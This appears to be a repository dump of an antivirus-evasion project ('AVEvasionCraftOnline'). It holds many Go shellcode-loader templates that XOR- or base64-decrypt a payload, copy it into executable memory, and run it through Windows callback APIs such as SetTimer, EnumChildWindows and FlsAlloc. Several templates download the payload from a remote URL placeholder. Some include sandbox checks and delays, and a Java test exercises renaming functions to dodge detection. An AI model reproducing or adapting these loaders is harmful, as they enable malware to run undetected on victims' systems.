DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(shellcode []byte) []byte { 57 | key := []byte{{{Key}}} 58 | decryptShellcode := XorDecrypt(shellcode, key) 59 | return decryptShellcode 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext := []byte{{{Shellcode}}} 69 | byteData := DecryptData(ciphertext) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/REMOTE/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "encoding/base64" 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | "github.com/valyala/fasthttp" 11 | "syscall" 12 | ) 13 | 14 | func XorDecrypt(plaintext []byte, key []byte) []byte { 15 | ciphertext := make([]byte, len(plaintext)) 16 | keyLength := len(key) 17 | for i, byte := range plaintext { 18 | keyByte := key[i % keyLength] 19 | encryptedByte := byte ^ keyByte 20 | ciphertext[i] = encryptedByte 21 | } 22 | return ciphertext 23 | } 24 | 25 | func DecryptData(v2 string) []byte { 26 | key := []byte{{{Key}}} 27 | v22, _ := base64.StdEncoding.DecodeString(v2) 28 | v222 := XorDecrypt(v22, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | func Sleeeep() { 51 | res := 1 52 | for i := 0; i < 5; i++ { 53 | number := rand.Intn(900) + 100 54 | res *= number 55 | } 56 | time.Sleep(10 * time.Second) 57 | } 58 | 59 | 60 | func fetchShellcode() []byte { 61 | 62 | url := "{{REMOTE_URL}}" 63 | 64 | _, body, _ := fasthttp.Get(nil, url) 65 | 66 | return body 67 | } 68 | 69 | func main() { 70 | 71 | args := os.Args[0] 72 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 73 | os.Exit(0) 74 | } 75 | 76 | Sleeeep() 77 | 78 | ciphertext := fetchShellcode() 79 | 80 | byteData := DecryptData(string(ciphertext)) 81 | 82 | Ldr1(byteData) 83 | 84 | } -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/test/java/com/yutian4060/avevasioncraftonline/utils/TextFileProcessorTest.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import org.junit.jupiter.api.Test; 4 | 5 | import java.io.IOException; 6 | import java.nio.file.Files; 7 | import java.nio.file.Paths; 8 | import java.util.Arrays; 9 | import java.util.List; 10 | 11 | import static com.yutian4060.avevasioncraftonline.utils.FileUtils.readFileBytes; 12 | import static com.yutian4060.avevasioncraftonline.utils.TextFileProcessor.*; 13 | 14 | class TextFileProcessorTest { 15 | 16 | @Test 17 | void replaceVariableNamesTest() { 18 | String code = """ 19 | func fetchShellcode(string url); 20 | func delayedLoading(); 21 | func checkDomain(); 22 | """; 23 | 24 | List functionNamesToReplace = Arrays.asList( 25 | // c 26 | "calc_payload", "payload_len", "calcSt", "calcTH", "oldProtectCalc", 27 | // nim 28 | "tId", "tHandle", "pHandle", "rPtr", "bytesWritten", 29 | // golang 30 | "fetchShellcode", "delayedLoading", "checkDomain" 31 | ); 32 | System.out.printf("replaceVariableNamesTest: %s\n", replaceFunctionNames(code, functionNamesToReplace));; 33 | } 34 | 35 | @Test 36 | void convertToHexStringWithoutPrefixTest() { 37 | 38 | String filePath = "C:\\1bypassAVOnline\\calc.bin"; 39 | System.out.printf("convertToHexStringWithoutPrefixTest: %s\n", convertToHexStringWithoutPrefix(readFileBytes(filePath))); 40 | 41 | 42 | } 43 | 44 | 45 | @Test 46 | void antiSandboxTest() { 47 | List antiSandbox = List.of(1001, 1002); 48 | String filePath = "C:\\1bypassAVOnline\\antisandbox\\out.go"; 49 | 50 | try { 51 | String content = Files.readString(Paths.get(filePath)); 52 | antiSandbox(content, antiSandbox); 53 | } catch (IOException e) { 54 | // 处理文件读取错误 55 | e.printStackTrace(); 56 | } 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | CAL_SMONTHNAME1 = 0x00000015 20 | ENUM_ALL_CALENDARS = 0xffffffff 21 | SORT_DEFAULT = 0x0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | User32 = syscall.NewLazyDLL("User32.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | EnumChildWindows = User32.NewProc("EnumChildWindows") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | if err != nil && err.Error() != "The operation completed successfully." { 36 | syscall.Exit(0) 37 | } 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | EnumChildWindows.Call(0, addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/EMBEDDED/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.NewProc("SymInitialize") 28 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Proces, _, _ := GetCurrentProcess.Call() 39 | SymInitialize.Call(Proces, 0, FALSE) 40 | SymEnumProcesses.Call(addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext := "{{Shellcode}}" 68 | byteData := DecryptData(ciphertext) 69 | Callback(byteData) 70 | } 71 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/REMOTE/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 21 | ntdll = syscall.NewLazyDLL("ntdll.dll") 22 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 23 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 24 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 25 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 26 | ) 27 | 28 | func Callback(shellcode []byte) { 29 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 30 | if err != nil && err.Error() != "The operation completed successfully." { 31 | syscall.Exit(0) 32 | } 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 35 | 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(v2 string) []byte { 50 | key := []byte{{{Key}}} 51 | v22, _ := base64.StdEncoding.DecodeString(v2) 52 | v222 := XorDecrypt(v22, key) 53 | return v222 54 | } 55 | 56 | func fetchShellcode(url string) []byte { 57 | _, body, _ := fasthttp.Get(nil, url) 58 | return body 59 | } 60 | 61 | func main() { 62 | args := os.Args[0] 63 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 64 | os.Exit(0) 65 | } 66 | 67 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 68 | byteData := DecryptData(string(ciphertext)) 69 | Callback(byteData) 70 | } 71 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/LOCAL/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | RESOURCE_ENUM_VALIDATE = 0x0008 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 28 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 37 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 38 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(string(ciphertext)) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/EMBEDDED/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | type MSG struct { 16 | } 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | dummy = 0 24 | ) 25 | 26 | var ( 27 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 28 | ntdll = syscall.NewLazyDLL("ntdll.dll") 29 | User32 = syscall.NewLazyDLL("User32.dll") 30 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 31 | SetTimer = User32.NewProc("SetTimer") 32 | GetMessageW = User32.NewProc("GetMessageW") 33 | DispatchMessageW = User32.NewProc("DispatchMessageW") 34 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 35 | ) 36 | 37 | func Callback(shellcode []byte) { 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | msg := MSG{} 41 | SetTimer.Call(NULL, dummy, NULL, addr) 42 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 43 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 44 | } 45 | 46 | func XorDecrypt(plaintext []byte, key []byte) []byte { 47 | ciphertext := make([]byte, len(plaintext)) 48 | keyLength := len(key) 49 | for i, byte := range plaintext { 50 | keyByte := key[i%keyLength] 51 | encryptedByte := byte ^ keyByte 52 | ciphertext[i] = encryptedByte 53 | } 54 | return ciphertext 55 | } 56 | 57 | func DecryptData(v2 string) []byte { 58 | key := []byte{{{Key}}} 59 | v22, _ := base64.StdEncoding.DecodeString(v2) 60 | v222 := XorDecrypt(v22, key) 61 | return v222 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := "{{Shellcode}}" 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/LOCAL/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | FALSE = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.NewProc("SymInitialize") 27 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Proces, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Proces, 0, FALSE) 39 | SymEnumProcesses.Call(addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(ciphertext) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | if1 [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 28 | FlsAlloc = kernel32.NewProc("FlsAlloc") 29 | FlsSetValue = kernel32.NewProc("FlsSetValue") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dIndex, _, _ := FlsAlloc.Call(addr) 37 | dummy, _ := syscall.UTF16PtrFromString("dummy") 38 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(string(ciphertext)) 72 | Callback(byteData) 73 | } 74 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/LOCAL/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | g_InitOnce [0]byte 11 | lpContext [0]byte 12 | ) 13 | 14 | type MSG struct { 15 | } 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | dummy = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | SetTimer = User32.NewProc("SetTimer") 31 | GetMessageW = User32.NewProc("GetMessageW") 32 | DispatchMessageW = User32.NewProc("DispatchMessageW") 33 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 34 | ) 35 | 36 | func Callback(shellcode []byte) { 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | 45 | func XorDecrypt(plaintext []byte, key []byte) []byte { 46 | ciphertext := make([]byte, len(plaintext)) 47 | keyLength := len(key) 48 | for i, byte := range plaintext { 49 | keyByte := key[i%keyLength] 50 | encryptedByte := byte ^ keyByte 51 | ciphertext[i] = encryptedByte 52 | } 53 | return ciphertext 54 | } 55 | 56 | func DecryptData(shellcode []byte) []byte { 57 | key := []byte{{{Key}}} 58 | decryptShellcode := XorDecrypt(shellcode, key) 59 | return decryptShellcode 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 69 | if err != nil { 70 | return 71 | } 72 | byteData := DecryptData(ciphertext) 73 | Callback(byteData) 74 | } 75 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | CAL_SMONTHNAME1 = 0x00000015 21 | ENUM_ALL_CALENDARS = 0xffffffff 22 | SORT_DEFAULT = 0x0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | EnumChildWindows = User32.NewProc("EnumChildWindows") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | if err != nil && err.Error() != "The operation completed successfully." { 37 | syscall.Exit(0) 38 | } 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | EnumChildWindows.Call(0, addr, 0) 41 | } 42 | 43 | func XorDecrypt(plaintext []byte, key []byte) []byte { 44 | ciphertext := make([]byte, len(plaintext)) 45 | keyLength := len(key) 46 | for i, byte := range plaintext { 47 | keyByte := key[i%keyLength] 48 | encryptedByte := byte ^ keyByte 49 | ciphertext[i] = encryptedByte 50 | } 51 | return ciphertext 52 | } 53 | 54 | func DecryptData(v2 string) []byte { 55 | key := []byte{{{Key}}} 56 | v22, _ := base64.StdEncoding.DecodeString(v2) 57 | v222 := XorDecrypt(v22, key) 58 | return v222 59 | } 60 | 61 | func fetchShellcode(url string) []byte { 62 | _, body, _ := fasthttp.Get(nil, url) 63 | return body 64 | } 65 | 66 | func main() { 67 | args := os.Args[0] 68 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 69 | os.Exit(0) 70 | } 71 | 72 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 73 | byteData := DecryptData(string(ciphertext)) 74 | Callback(byteData) 75 | } 76 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | dummy [522]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | RESOURCE_ENUM_VALIDATE = 0x0008 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 29 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | 37 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 38 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 39 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func fetchShellcode(url string) []byte { 60 | _, body, _ := fasthttp.Get(nil, url) 61 | return body 62 | } 63 | 64 | func main() { 65 | args := os.Args[0] 66 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 67 | os.Exit(0) 68 | } 69 | 70 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 71 | byteData := DecryptData(ciphertext) 72 | Callback(byteData) 73 | } 74 | 